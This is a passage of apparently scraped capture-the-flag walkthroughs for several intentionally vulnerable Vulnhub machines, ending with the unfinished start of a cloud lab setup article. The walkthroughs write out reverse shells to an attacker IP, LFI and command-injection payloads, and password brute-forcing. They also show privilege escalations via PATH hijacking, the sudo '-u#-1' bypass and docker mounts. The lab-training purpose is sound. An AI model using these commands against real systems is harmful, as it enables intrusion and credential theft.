HA: Avengers Arsenal Vulnhub Walkthrough

October 31, 2019, 11:17 am

Today we are going to solve our Capture the Flag challenge called “HA: Avengers Arsenal” We have developed this lab for the purpose of online penetration practices. It contains 5 flags in the form of Avenger’s Weapons. Let's Solve it!!

Download Here

Level: Intermediate

Task: Find 5 Flags on the Target Machine.

Penetration Methodologies

· Network Scanning

· Netdiscover

· Nmap

· Enumeration

· Browsing HTTP Service

· Enumerating Git logs

· Directory Bruteforce using drib

· Decoding using Spammimic

· Enumerating using cupp

· Bruteforcing using John the Ripper

· Exploitation

· Getting a reverse connection

· Spawning a TTY Shell

· Privilege Escalation

· Path Variable

Walkthrough

Network Scanning

After downloading and running this machine in VMWare Workstation, we started by running the Netdiscover command to obtain the IP Address of the target machine. After matching the MAC and IP Address we have obtained the Virtual Machine IP address, 192.168.1.101 (the target machine IP address).

netdiscover

So, as we have the target machine IP, the first step is to find the ports and services that are available on the target machine. A Nmap aggressive port scan is used for this purpose. This is illustrated in the image given below.

nmap -A 192.168.1.101

We got a lot of important information from this scan. For starters, we get the .git directory. We are going to enumerate it. We also got the /groot directory. It is also worth taking a look. And alas we got the Splunk service running at port 8000 and 8089.

Let’s start with the HTTP port. We quickly opened the target machine IP on the browser. A web page was running through this port which can be seen in the following image.
http://192.168.1.101

Before enumerating any further we went back to our nmap scan to get that .git directory. We decided to open it. Upon opening the .git directory we found a logs directory. We opened it to find the HEAD page. Here on the HEAD page we found another link mentioned “https://github.com/Hackingzone/hackingarticles.git”

We thought it was worth taking a look, so it was better to clone this git to out attacker machine and then investigate it further. Hence, the git clone command allows to transfer the git to our Kali Linux. Here, after cloning we see that a directory is created with the name of hackingarticles. We traversed into that particular directory. Here to inspect the git repo we used the command git log. This gave us a commit worth enumerating.

git clone https://github.com/Hackingzone/hackingarticles.git

cd hackingarticles/

git log

After getting inside the hackingarticles directory we see that there are a bunch of text files. But amongst them was a “updated” log entry. This seemed interesting. So, we took a close look using the git show command. And here we have a Base64 Encoded text.

git log 4fb65717a4bdfa8169fb0642abf0f355f7eea048

git show 4fb65717a4bdfa8169fb0642abf0f355f7eea048

Q2FwdGFpbiBBbWVyaWNhJ3MgU2hpZWxkOnswNjE3ODZEOUE4QkI4OUEyRkU3NDVERDI2RkUyRTEzQ30=

As we identified the encoded text to be base64 we tried to decode it with the combination of the echo command with the base64 -d. This gave us our First Flag: Captain America's Shield

echo "Q2FwdGFpbiBBbWVyaWNhJ3MgU2hpZWxkOnswNjE3ODZEOUE4QkI4OUEyRkU3NDVERDI2RkUyRTEzQ30=" | base64 -d

Moving on as a part of the Enumeration, we also started a directory bruteforce scan using the dirb tool. Here we found a bunch of directories like css and images. We thought that let’s inspect all the directories in search of another flag.

dirb http://192.168.1.101

So, we opened the images directory in our Web Browser. We see that there are bunch of different images in this directory that would be appearing on the website. We tried opening each and everyone of them. And we found something different with the image named “17”

Upon opening this image, we found that it was a QR Code. This didn’t appear on the website that was running on the port 80. So, we decide to read it to proceed further.

http://192.168.1.101/images/17.jpeg

We used a Mozilla Firefox Web Browser Plugin to decode the QR Code. You can use any method or tool of your preference. This read out to be “spammimc”. This is definitely an interesting hint.

As this word is new to any of the dictionaries that we used the in directory bruteforce. So, there might be a probability of finding a directory with that name. Which would be hidden to any of the directory bruteforce scan. We tried to open the directory with the name spammimc. And it was a success we found a text file called sceptre.txt. This is great as we are closer to our next flag.

We opened the scepter.txt, to find it to be absolutely blank. This was a bummer. But as we inspected the page closely; we found that there was indeed something written but it seemed to be hidden in the plain sight. But how to get our flag from this seems to be a mystery. We went back to the hint we got, “spammimc”. There seems to be more that to it than it meets the eyes. So, we googled it.

We found this cute little site that encodes and decode the text in various formats. This is really clever. We searched for the blank space. And then copied the contents of the scepter.txt and pasted here on the spammimc website to decode it. Upon decoding we found that it is our second flag.

Loki’s Scepter

We got the 2 flags. It’s a good start. Now moving on, we went back to our initial nmap scan. We saw that we found a directory named groot. How amazing. This is absolutely our way to another flag. So, we browsed the groot directory in our browser to find a zip file called “hammer.zip”. Brilliant.

http://192.168.1.101/groot

We download the zip file to our attacker system and tried to open it. Upon opening we see that it contains a pdf file with the name Mjølnirlonir. But it asks for a password. This is speedbump.

Cracking passwords is not that easy. We need to do enumeration for it. We went back to the webpage we saw earlier. We saw that there is a link to another webpage. It seemed like a spoof of a Social Network Account. This seemed to be the one of Tony Stark.

192.168.1.101/avengersbook.html

We see that we have the name, alias, address, date of birth and other important stuff and usually people keep the passwords related to it. So, we decided to use the cupp to create a dictionary of the most probable passwords. We fired up the cupp as illustrated in the given image. We provided the following information to it.

./cupp.py -i

First Name: tony

Surname: stark

Nickname ironman

Bithdate: 01052008

After providing these details, cupp made us a nice short dictionary and named it tony.txt.

Now that we have the dictionary to bruteforce, its time to get the hash to bruteforce. For this we are going to need a script called zip2john. It gives us the hash from the zip file that could be cracked with John the Ripper. After getting the hash we ran the John the Ripper to find out that the password for the zip file is Stark12008.

locate zip2john

cd Downloads/

/usr/sbin/zip2john hammer.zip > hash

john --wordlist=/root/cupp/tony.txt hash

Moving on we extracted the contents of the zip file. To see that it contains a pdf document.

unzip hammer.zip

We tried to open the pdf document. But we find that it is yet another protected with a password.

Now we are going to bruteforce the password like we did with the zip file. First, we are going to need to get a password hash. We used the pdf2john script for that process. After getting the hash we tried to crack the password on the pdf file using John the Ripper. It came out to be “Tony_050081”.

/usr/sbin/pdf2john.pl Mjølnirlonir.pdf > hashes

john --wordlist=/root/cupp/tony.txt hashes

Now that we have the password for the pdf file we went back to the file. We entered the password that we just cracked. And That’s when we get another flag. It’s the Thor’s Mjølnir.

As we don’t have any way to move forward from here, we went back to the original website hosted on the port 80. As we have seen in some of the previous labs that the lab authors love to hide hints in the source code. So, we started to examine the source code of the lab. We find that there is a reference of a link that was not connected to any particular Button or text on the webpage. Only way to access it, is through clicking on it through the source code. It is named ravagers.html. Love the Guardians of the Galaxy Reference.

Hoping we hit a lucky spot we rushed to open the said link. Much to our demise we find that it was just a blank page. For a while it seemed that it was a rabbit hole. But we remembered how we got here in the first place, through the source code. So, we tried looking at it. And we found some number that might look like hex code.

We went on to an online hex converter. To find that it says “agent:avengers”. As per convention we know that mostly the login credentials are written in that format separated by colon.

It was a thought that where we might put these credentials. Then we remembered that in our initial nmap scan. We found the Splunk is installed on the system. Looking for flags everywhere, we actually kind off forgot all about the Splunk. So, we decided to try and open the Splunk portal by browsing the IP Address followed by the port on which Splunk is running.

http://192.168.1.101:8000

The information we got earlier from the previous screenshot is in fact login credentials. The username is “agent” and the password are “avengers”, we enter these and are able to get into the Splunk account.

We looked around for a while and then decided to upload a shell to the account. On searching, we found a way to weaponize Splunk with reverse and bind shell from this link.

The .gz file from the link was saved on our system, we navigate to the “App: Search & Reporting” option and click on “Manage Apps”.

Click on the “Upload app” option. Using the browse option, we find our shell, select it and upload it.

Click on the “Restart Now” to restart the application.

We scroll down to find our shell file as shown below. Before we can run, it we need to click on the “Permissions” option to change its permissions.

Configuration files need to be added in order to run the shell successfully, here we set permission to everyone and at the bottom, we click on the “All apps” radio button and save this change.

Now to execute the shell. We navigate to the search option in Splunk and type in our command defining that we want a reverse shell of standard type to talk to out attach machines IP on the listening port.

| revshell std 192.168.1.107 1234

Netcat is running on our machine listening on port 1234 and see shell talking back.

nc -lvp 1234

We used Msfvenom to create a python payload.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.107 lport=4444 R

The payload is uploaded through our existing Netcat session, all that needed to be done was the payload to be pasted into the terminal and executed.

Privilege Escalation

A new Netcat session is started on the port (4444) that we defined in our payload and we see the execution occur flawlessly.

nc -lvp 4444

python -c 'import pty;pty.spawn("/bin/bash")'

find / -perm -u=s -type f 2>/dev/null

Then without wasting any time we searched for any file having SUID or 4000 permission with the help of Find command.

The Find command gave us an interesting file named “ignite”. We will try to enumerate this further.

Now, we need to compromise the target system further to the escalate privileges. PATH is an environmental variable in Linux and Unix-like operating systems which specifies all bin and sbin directories that hold all executable programs are stored. When the user run any command on the terminal, its request to the shell to search for executable files with the help of PATH Variable in response to commands executed by a user. So, when we exported the PATH and ran the command. It gave us the root shell. After getting the root shell we moved onto the root directory to look for flags. Here we find a final.txt. We opened the flag using the cat command to find the Strom Breaker Flag.

cd /tmp

echo "/bin/bash"> ifconfig

chmod 777 ifconfig

export PATH=/tmp:$PATH

/opt/ignite

cd /root

cat final.txt

Now although we have rooted the lab and this could be the end of the lab if it was labelled as Boot to Root. But it is defined as Capture the Flag and so far, we have 4 flags. That means we are at a loss of one flag. So, to look for it we were enumerating in the /opt directory. Here we found 2 files. One was yakahints.txt. So nice of them to give us hints like that. And another was an MS Excel File named yaka.xlsx. We opened the yaka hints. To find that it says “Guardians of The Galaxy Vol. 1 Release date is 20 14”. That is definitely a bizarre way to write a date. Keeping in mind, we download the file to our system by transferring the file to /var/www/html.

cd /opt

cat yakahints.txt

cp yaka.xlsx /var/www/html/

Now, after downloading we find that the file was absolute blank. But that hint, contained the date written in a weird way. So, we thought what if 20 was the Row and 14 was the column. Now as the Excel sheet has Columns written as alphabets. We went on to the 14^th alphabet. After going to the cell N20, we see that we have the Final flag in the Formula Bar. We found the fifth flag.

This concludes the Lab. We hope the readers might learn a lot from this CTF Challenge. This Lab is truly testing one’s ability to Enumerate.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

↧

HA Rudra: Vulnhub Walkthrough

October 31, 2019, 12:52 am

≫ Next: HA: Chakravyuh Vulnhub Walkthrough

≪ Previous: HA: Avengers Arsenal Vulnhub Walkthrough

This is our Walkthrough for HA: Rudra” and this CTF is designed by Hacking Articles Team 😊. Lord Rudra also known as Shiv, Bolenath, Mahadev and he is Venerable by Hinduism. We have designed this vm because it is festival eve in India and all Indian strongly believe in Indian culture and religions and also to spread awareness of Indian culture among all people, hope you will enjoy.

There are multiple methods to solve this machine or direct way to finish the task.

You can download from here.

Level: Intermediate

Task: Boot to Root

Penetration Methodologies

Initial Recon

· Ndetsicover

· Nmap

· Shared directory

· dirb

Initial Compromise

· LFI

Established Foothold

· Netcat session

Internal Recon

· Access Mysql database

Data Exfiltration

· Steganography

Lateral Movement

· Connect to ssh

Privilege Escalation

· Sudo rights

Walkthrough

Initial Recon

First of all, we try to identify our target. We did this using the netdiscover command. It came out to be

192.168.1.101

Now that we have identified our target using the above command, we can continue to our second step that is scanning the target. We will use nmap to scan the target with the following command:

nmap -A 192.168.1.101

We found port 22, 80 and 2049 are open for ssh, http and nfs respectively, let’s go for services enumeration.

When you will explore machine IP in the web browser, it will display the beautiful sight of lord shiva.

If you didn’t find any hint from web page, then without wasting time enumerate the share directory since nfs service is running on the host machine.

showmount -e 192.168.1.101

cd /tmp

mkdir ignite

mount -t nfs 192.168.1.101:/home/shivay /tmp/ignite

cd ignite

when you will mount the whole shared directory in your local machine, you’ll a text file named “mahadev.txt”.

Till now we didn’t find any hint to establish our foothold, therefore we chose DIRB for directory brute force attack and Luckily found url for robots.txt file.

Now when you will navigate to following URL, it will give a hint for nandi.php

http://192.168.1.101/robots.txt

But on exploring /nandi.php, it will give you blank page and this hint might be indicating possibility for LFI.

http://192.168.1.101/nandi.php

Initial Compromised

To ensure that the host machine is vulnerable to LFI, you need to try to extract /etc/passwd file and this will show you some usernames from here: Rudra, Shivay and mahakaal as shown below.

This phase is considered as initial compromised stage because with the help of LFI we are able to extract low privilege data.

Established foothold

To established foothold you need to spawn shell of the host machine by injecting malicious file. As you know due to nfs we are able to access share directory and also web application is vulnerable to LFI and for exploiting the host machine first upload the php backdoor (penetestmonkey php reverse shell) inside the mount directory “/tmp/ignite” and then execute it through web browser.

As you can observe in above image, we have uploaded the php backdoor inside /tmp/ignite and now will use LFI to trigger the shell.php file. Keep the netcat listener ON for reverse connection.

http://192.168.1.101/nandi.php?file=/home/shivay/shell.php

Internal Recon

As soon as you will trigger the backdoor, it will give reverse connection of the host machine.

Once we have compromised the host machine, then go for Internal Recon, as you can observe this time, we have used netstat to identify the network statics and found mysql is running on localhost.

Without wasting time, we get into mysql dbms and enumerated following information:

Database name: mahadev

Table name: hint

Record: check in media filesystem

It means there are is something inside media filesystem and author wants to dig it out.

Data Exfiltration-Steganography

So, when you will move inside /media directory then you will get two files named “creds and hint” and the “hint” file contains following hints:

Link: https://www.hackingarticles.in/cloakify-factory-a-data-exfiltration-tool-uses-text-based-steganography/

Message: Without noise

The cred file contains emojis and it looks like a kind of steganography, download the cred file in your local machine (I saved as /root/pwd) and without wasting we explored the given link. This link will open the article on data exfiltration tool named cloackify which is used by author for hiding text behind emojis.

With the help of above link, you can extract the hidden text behind emojis. Follow the below step in your local machine.

Download the tool from github and run python script as shown then decrypt the file without noise as given inside the hint file.

python cloackifyFactory.py

Press key: 2

Decloackify path: /root/pwd

Path for saved decloacked data: /root/decodedpwd

Add noise: No

Choose emoji as type of ciphers and press key 3. This will save the decoded text inside /root/decodedpwd as shown below.

And we found the credential for following:

Username: mahakaal

Password: kalbhairav

Lateral Movement

So with the help above credential we connect to ssh service and start post enumeration. Thus, we check sudo right for mahakaal and found that he has sudo right to run /usr/bin/watch program other than root which means with ALL specified, user mahakaal can run the binary / usr/bin/watch as any user.

Privilege Escalation

The author added this loophole because it is latest zero-day exploit CVE: 2019-14287 and you should to proactive to bypass it.

Type following for escalating the root the shell:

sudo -u#-1 watch -x sh -c ‘reset; exec sh 1>&0 2>&0’ -u

cd root

cat final.txt

Conclusion: The VM was designed to cover each track of kill chain by considering red team approach and proactive learning with latest vulnerabilities.

Hope you have enjoyed this machine. Happy Hacking!!!!!!!

↧

HA: Chakravyuh Vulnhub Walkthrough

November 5, 2019, 9:27 am

≫ Next: Gears of War: EP#1 Vulnhub Walkthrough

≪ Previous: HA Rudra: Vulnhub Walkthrough

Today we are going to solve our Boot to Root challenge called "HA Chakravyuh". We have developed this lab for the purpose of online penetration practices. It is based on the Mahabharat Saga's renowned Battle Formation by the same name. Let's Solve it!!

Download Here

Level: Intermediate

Task: To Enumerate the Target Machine and Get the Root Access.

Penetration Methodologies

· Network Scanning

o Netdiscover

o Nmap Scan

· Enumeration

o Browsing HTTP Service

o Anonymous FTP Login

o Password Bruteforce using John The Ripper

o Getting Login Credentials

o Searching Exploit using Searchsploit

· Exploitation

o Exploiting LFI Vulnerability

o Getting a reverse connection

o Spawning a TTY Shell

· Privilege Escalation

o Docker

Walkthrough

Network Scanning

After downloading, run the Machine in VMWare Workstation. To work on the machine, we will be needing its IP Address. For this, we will be using the netdiscover command. After matching the MAC and IP Address we found the Virtual Machine IP Address to be 192.168.1.105.

netdiscover

Now that we have the Target Machine IP Address, our next logical step would be to do a port scan on the target to get information about the various services that are running on the target machine. After the Aggressive Scan of all the ports, we see that we have the SSH service (22), HTTP service (80), FTP service (65530) running on the Target Machine. We did a scan for all the ports because sometimes Administrators set up a service on a different port altogether so that they are not visible in a normal scan.

nmap -p- -A 192.168.1.105

Enumeration

Moving on, we observed that we have the HTTP service running. It is probable that a web page is hosted. So, we decided to take a look through our Web Browser. It contained a webpage with a painting depicting Arjuna battling to break the Chakravyuh. We did thorough browsing of the webpage. We went through its source code and images, but there was no way in or any hint.

http://192.168.1.105

We then diverted our attention to the service that was shifted to port 65530. During our Nmap aggressive scan, we saw that Nmap was able to tell us that the Anonymous login is enabled on this server. We decided to take a look at the shared files. So, after logging in the FTP service we looked around to find a directory named pub. Inside it was a Compressed 7z file named arjun. To take a closer look we downloaded the file with the help of get command.

ftp 192.168.1.105 65530

Anonymous

cd pub

get arjun.7z

bye

After successfully downloading we tried to open the Compressed file using the Archive Manager as shown in the image below. It gave us a prompt for a password. We currently didn’t have any passwords. So now we have to try and enumerate the password for this file.

We didn’t have any choice other than brute force the password. In order to brute force with John The Ripper. We required a python script that could give us the hashed from the compressed file. These scripts usually have the name as “xyz2john”, where xyz would be the file extension that we need hashes from. We googled 7z2john, we found the script and saved on our system as 7z2ctf.py. It is pretty easy to find this script. But still, if you don’t get it, you can download by clicking here. Now that we have the python script, we extracted the hashes from the file and ran John The Ripper to crack the password hash. Upon cracking we see that we have the password as “family”.

python 7z2ctf.py arjun.7z > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

john hash --show

arjun.7z:family

We opened the Compressed file to find a text file named secret inside it. On opening the secret.txt we find an encoded text inside it. On a first look, it seemed like Base64 encoded text.

Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=

We decoded the text found in the secret.txt using the echo and base64 command. The encryption was indeed base64. Upon decryption, we see that the text hints that we have Gila CMS to deal with in this scenario. Also, we got what seems to be a login id and password.

echo "Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=" | base64 -d

gila:admin@gmail.com:princesa

Since we got the hint that we have the Gila CMS. We tried to visit the link to access the page hosted with the help of Gila CMS. And we have a webpage as shown in the image below.

http://192.168.1.105/gila/

We also tried the admin keyword to access the login panel. This came out to be the actual login panel. So, we entered the credentials we found earlier.

http://192.168.1.105/gila/admin

admin@gmail.com

princesa

They worked like charm. We got inside the Gila CMS admin panel. We took a look around to see if we have any hints or any way to exploit it.

After looking for a while we couldn’t find any way in through the CMS. So, we went onto the basics. We searched for Gila CMS in searchsploit. We saw that we have a Local File Inclusion Vulnerability that could be useful. We downloaded the exploit to our Attacker machine. After completion of the Download.

searchsploit gila cms

Gila CMS < 1.11.1 - Local File Inclusion

searchsploit -m 47407

cat 47407.txt

Exploitation

In the exploit we see that we have the link but as mentioned by the author of the exploit that the PoC mentioned works on Xampp Server and we have a Linux machine as the target machine. So, we changed the link to point at the /etc/passwd. Also, it has the website set at the gilacms section and we found that we have it at /gila/. So, we changed that bit too.

http://192.168.1.105/gila/admin/fm/?f=src../../../../../../../../../etc/passwd

We see that we have the list of all the files hosted via the Gila CMS. We see that we have the index.php file. It seemed like our way in. So, we opened the file. It contained the PHP code for the display of the index page. We used our PHP reverse shellcode by pentestmonkey. It can be found here. We changed the IP Address in the shell to the IP Address of our Attacker Machine. We started a netcat listener on our attacker machine on the port that we mentioned in our reverse shell. After making the necessary changes, we saved the changes in index.php. And we opened the file in the Web Browser.

As we opened the file, the PHP reverse shell got executed and we got the shell on the target machine. It was an improper shell. So, we used the python one-liner to convert it into a proper shell. After getting the shell as per our satisfaction we ran the id command to see the users and groups on the target machine. We got to know that we have a docker user group. This could help us in Privilege Escalation.

nc -lvp 1234

python -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation

Since we have access to the user which is a part of the docker group. While working we docker we know that there is an issue with the docker that all the commands in docker require sudo as docker needs root to run. The Docker daemon works in such a way that it is allowed access to the root user or any other user in the particular docker group. This shows that access to the docker group is the same as to give a perpetual, root access without any password. We ran the command shown below. This command obtains the alpine image from the Docker Hub Registry and runs it. The –v parameter specifies that we want to create a volume in the Docker instance. The –it parameters put the Docker into the shell mode rather than starting a daemon process. The instance is set up to mount the root filesystem of the target machine to the instance volume, so when the instance starts it immediately loads a chroot into that volume. This gives us the root of the machine. After running the command, we traverse into the /mnt directory and found out flag.txt. This concludes this lab.

docker run -v /root:/mnt -it alpine

cd /mnt

cat final.txt

↧

Gears of War: EP#1 Vulnhub Walkthrough

November 15, 2019, 9:16 am

≫ Next: Mumbai:1 Vulnhub Walkthrough

≪ Previous: HA: Chakravyuh Vulnhub Walkthrough

Gears of War: EP#1 VM is made by eDu809. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to get root and to read the root flag.
Level: Intermediate
Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

Netdiscover
Nmap Port Scan

Enumeration

Browsing HTTP Service
SMB Login

Exploiting

Using Crunch to generate wordlist
Using Fcrack to bruteforce ZIP file password
Using Hydra to bruteforce SSH Login

Privilege Escalation

Reading /etc/passwd File
Getting SUID bit files
Using Openssl for generating password hash
Adding User to /tmp file
Reading Final Flag

Walkthrough

Network Scanning

Let’s start by scanning the network for targets using Netdiscover.
netdiscover

We found target IP Address 192.168.1.184. Let’s begin with basic port scanning with NMAP.
nmap -A -p- 192.168.1.184

Enumeration

For more details, we will need to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service since port 80 is open.

Since HTTP service was not much of a help. On the other hand, we can clearly note from the nmap scan that we have the SMB service running, and we don’t have any credentials for the ssh so we went directly on with SMB. We logged in using the command mentioned. There is a list of shared directories. We tried accessing LOCUS_LAN$ directory and enumerated it. We find a notes.txtfile and msg_horda.zip file. Let’s transfer these files on our machine to read their contents.
smbclient -L 192.168.1.184
smbclient //192.168.1.184/LOCUS_LAN$
get msg_horda.zip
get SOS.txt
ls

We tried opening the msg_horda.zip file but it seems password protected.

We thought of reading the contents of SOS.txt file and it was a success. It surely gave us a hint about the characters of the password for ZIP file.

Exploiting

It’s time to FIRE UP!! Crunch and generate a wordlist as per the combination of the password we have fetched from the SOS.txt file.
crunch 4 4 -t @%%, -o wordlist

Once the wordlist is all set up, we have used FCRACK TOOL to crack the password for the ZIP file as shown below.
frackzip -D -u -v -p wordlist msg_horda.zip
The password for the ZIP file is r44M. We also found a key.txt file inside the ZIP file.

After reading the key.txtfile, we got another credentials which could be useful for SSH login but we still need a username. Bring up HYDRA.

We have brute forced the username for SSh Login using hydra with password 3_d4y.
hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y -T4 192.168.1.184 ssh

After successfully logged into SSH, we try enumerating the /etc directory but couldn’t because user Marcus doesn’t have the privileges to access the /etc directory.
ssh marcus@192.168.1.184
id
cd /etc

Privilege Escalation

Since our target machine is in a bash shell. We will be using a command to force SSH for TTY allocation. This will help us run commands as an administrator. Finally we are able to access the /etc directory.
ssh marcus@192.168.1.184 -t “bash --noprofile”
cd /etc

pwd

On reading the passwd file which was not much helpful, but we got an idea what we can do next.
cat passwd

On checking the SUID bit for all the readable files under /bin directory, we came to know that current user can use the cp command. This is going to be interesting.
find /bin -type f -perm -u=s 2>/dev/null

Without any further waiting we need the password hash for the user that we are going to create on the target machine by making an entry in the /etc/passwd file. We are going to use the openssl to generate a salted hash.
openssl passwd -1 -salt raj pass123

Now back to our user marcuson the target machine. Here we are going to use the hash that we generated in the previous step and make a user raj which has the elevated privilege. We have use nano command to make a entry in the /tmp directory. After making an entry we checked the entry using the tail command. cd /tmp
nano passwd
cat passwd | tail

Now all we to do login using username and password, we just created to get our root shell. On enumeration we found flag.txt.
su raj
whoami
cd /root
ls
ls -al

Time to Read our Final Flag!!
cat flag.txt

↧

Mumbai:1 Vulnhub Walkthrough

November 17, 2019, 9:50 pm

≫ Next: Multi Ways to Setup Cloud Pentest Lab using OwnCloud

≪ Previous: Gears of War: EP#1 Vulnhub Walkthrough

Mumbai:1 VM is made by Dylan Barker. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to get root and to read the root flag.
Level: Intermediate
Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning
•Netdiscover
•Nmap Port Scan
Enumeration
•Anonymous FTP Login
•Browsing HTTP Service
•Scanning directories using Dirb Tool
•Using Curl to send Get & Post Request
•Executing Python Script keywords.py
Exploiting
•Executing test.php using Curl
•Fuzzing and Checking for RCE using Curl
•Uploading PHP Reverse Shell
•Getting User access on Netcat Listener
Privilege Escalation
•Using Docker to get Root Access
•Reading Final Flag

Walkthrough

Network Scanning

Let’s start by scanning the network for targets using Netdiscover.
netdiscover

We found the target IP Address 192.168.1.221. Let’s begin with basic port scanning with NMAP.
nmap -A -p- 192.168.1.221

The Anonymous Login is allowed for FTP port 21 on the target machine. Then let’s begin enumerating the FTP port and look for some shared files. On enumeration, we found a file Note. We downloaded it on our system and read its contents. It surely is a clear hint for our next step.
ftp 192.168.1.221
ls
get Note
cat Note

Enumeration

For more details, we will navigate to a web browser for exploring HTTP service since port 80 is open. It clearly is not enough for a clue to proceed.

Recalling from the Nmap result, we thought of browsing Target's IP Address along with port 8000. Since port 8000 depicts Nginx server is installed on the Target Machine.
192.168.1.221:8000

Till now we didn’t find any hint to establish our foothold, therefore we chose DIRB for directory brute force attack and found URL for drupal and wordpress directories. On browsing, these were just empty directories.
dirb http://192.168.1.221

It strikes us let’s look for specific file extensions over the target server in the directories. We discovered test.php and keywords.py files. The first thing to do is to read the contents of PHP files because they seem quite suspicious to us.
dirb http://192.168.1.221:8000 -X .php, .txt, .py

On sending a request to the Target Server to access test.php, we discovered it is asking us to make POST request for a proper query along with the URL.
curl http://192.168.1.221:8000/test.php

Now let’s download the keywords.py file on our system and executed the script which gave information to proceed. We ran the script against few directories but wordpress gave us the actual understanding of the script. This script just stores words into a list and then counts how many times each word has occurred.
wget http://192.168.1.221:8000/keywords.py
python3 keywords.py --help
python3 keywords.py --query http://192.168.1.221:8000/test.php
python3 keywords.py --query http://192.168.1.221/
python3 keywords.py --query http://192.168.1.221/drupal
python3 keywords.py --query http://192.168.1.221/wordpress

Exploiting

We thought of sending a POST request to test.php as shown below. So the result shows test.php script is acting as a wrapper which is trying to pass data to keywords.py script and return the output back to the request. There are ways where we can try escaping this into RCE. Now, this is a Challenge. After intense fuzzing we finally escaped it with an RCE now, one final thing left is to get a shell.
curl -d “query=http://192.168.1.221/wordpress” http://192.168.1.221:8000/test.php
curl -d “query=http://192.168.1.221/wordpress;id” http://192.168.1.221:8000/test.php

After a little bit of playing around with our RCE, we did some enumeration and created a PHP Reverse Shell which we have uploaded from our machine to the target server to get the root. To get that we have executed the Php reverse shell along with that we have also executed a Netcat listener to establish a reverse connection.
curl -d “query=http://192.168.1.221/wordpress;pwd;ls al” http://192.168.1.221:8000/test.php
curl -d “query=http://192.168.1.221/wordpress;wget http://192.168.1.221:8000/phpshell.php;ls -al” http://192.168.1.221:8000/test.php
curl -d “query=http://192.168.1.221/wordpress;php phpshell.php” http://192.168.1.221:8000/test.php

Therefore we have got a half shell, we tried spawning it with our usual trick of using a TTY shell but nothing changed.
nc -lvp 1234
python -c ‘import pty;pty.spawn(“/bin/bash”)’
id
pwd

Privilege Escalation

To proceed with our privilege escalation, we tried a few things but didn’t work out. In the end, to get our final flag, we used docker but there is an issue with the docker that all the commands in docker require sudo as docker needs root to run. The Docker daemon works in such a way that it is allowed access to the root user or any other user in the particular docker group. This shows that access to the docker group is the same as to give a perpetual, root access without any password. We ran the command shown below. This command obtains the alpine image from the Docker Hub Registry and runs it. The -v parameter specifies that we want to create a volume in the Docker instance. The -it parameters put the Docker into the shell mode rather than starting a daemon process. The instance is set up to mount the root filesystem of the target machine to the instance volume, so when the instance starts it immediately loads a chroot into that volume. This gives us the root of the machine. After running the command, we traverse into the /mnt directory and /ignite directory to found Proof.txt.
docker run -it -v /root:/mnt/ignite ubuntu
cd /mnt
cd ignite
ls

The final thing to do is to read the FLAG!!
cat proof.txt

↧

Multi Ways to Setup Cloud Pentest Lab using OwnCloud

November 18, 2019, 8:03 pm

≫ Next: EVM: 1 Vulnhub Walkthrough

≪ Previous: Mumbai:1 Vulnhub Walkthrough

This article is all about setting up a Private Cloud on your local machine on: ubuntu, docker and VM. But before it is installed and configured, you should know what the cloud is and why it is a very important part of IT organizations.

Table of Content

· Cloud Computing

· Benefits of Cloud Computing

· Types of Cloud Computing

· Cloud Computing Deployment Models

· How cloud computing works

· Installation of Own cloud in Ubuntu

· Installation of OwnCloud using Docker

· Bitnami Owncloud Stack Virtual Machines

Cloud Computing

Cloud computing is the on-demand delivery of compute power, database, storage, applications, and other IT resources via the internet with pay-as-you-go pricing. Whether you are using it to run applications that share photos to millions of mobile users or to support business critical operations, a cloud services platform provides rapid access to flexible and low-cost IT resources.

In other words, cloud computing means, storing and accessing information and programs over the internet instead of the hard drive of your computer. You can access as many resources as you need, almost instantly, and only pay for what you use.

Benefits of Cloud Computing

· Cost Saving– Pay for what you use.

· Agile deployment– Easy and fast access a broad range technology (database, storage, compute etc.) on as per the requirement.

· Location Independent–Deploy your application in multiple physical locations around the world with just a click.

· Disaster Recovery– No environmental disruption, no natural calamity effect.

· Elasticity- Instantly scale up or down the amount of resources that actually need.

Types of Cloud Computing

There are three main types or models of cloud computing. Each type of cloud service, and deployment method, provides you with different levels of control, flexibility, and management.

· Infrastructure as a Service (IaaS) -It isa cloud computing offering in which a vendor provides users access to computing resources such as servers, storage and networking. Organizations use their own platforms and applications within a service provider’s infrastructure.

Example: Linode, Rackspace, Amazon Web Services (AWS), Cisco Metapod, Microsoft Azure, Google Compute Engine (GCE)

· Platform as a service (PaaS)- It is a cloud computing offering that provides users with a cloud environment in which they can develop manage and deliver applications. In addition to storage and other computing resources, users are able to use a suite of prebuilt tools to develop, customize and test their own application also can providers manage security, operating systems, server software and backups.

Example: AWS Elastic Beanstalk, Windows Azure, Force.com, Google App Engine, Apache Stratos.

· Software as a service (SaaS) -It is a cloud computing offering that provides users with access to a vendor’s cloud-based software. Users do not install applications on their local devices. Instead, the applications reside on a remote cloud network accessed through the web or an API. Through the application, users can store and analyse data and collaborate on projects.

Example: Google Apps, Dropbox, Salesforce, Cisco WebEx,

Cloud Computing Deployment Models

· Cloud (Public) - A cloud-based application is fully deployed in the cloud and all parts of the application run in the cloud. Applications in the cloud have either been created in the cloud or have been migrated from an existing infrastructure to take advantage of the benefits of cloud computing.

· Hybrid- A hybrid deployment is a way to connect infrastructure and applications between cloud-based resources and existing resources that are not located in the cloud. The most common method of hybrid deployment is between the cloud and existing on-premises infrastructure to extend, and grow, an organization's infrastructure into the cloud while connecting cloud resources to internal system.

· On-premises (Private)– Private Cloud refers to the cloud solution dedicated for use by a single organization. The data centre resources may be located on-premise or operated by a third-party vendor off-site. The computing resources are isolated and delivered via a secure private network, and not shared with other customers.

How cloud computing works

